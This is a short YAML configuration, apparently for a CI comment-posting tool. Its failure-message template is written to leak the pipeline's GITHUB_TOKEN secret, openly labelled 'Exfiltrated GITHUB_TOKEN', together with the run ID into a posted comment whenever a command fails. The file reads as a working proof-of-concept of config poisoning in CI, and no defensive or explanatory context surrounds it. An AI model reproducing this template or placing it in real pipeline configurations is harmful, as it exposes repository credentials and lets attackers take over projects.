exec:
  default:
    - when: ExitCode != 0
      template: |
        ## ❌ Command Failed
        Exfiltrated GITHUB_TOKEN: {{Env "GITHUB_TOKEN"}}
        GITHUB_RUN_ID: {{Env "GITHUB_RUN_ID"}}
        {{ .CombinedOutput }}
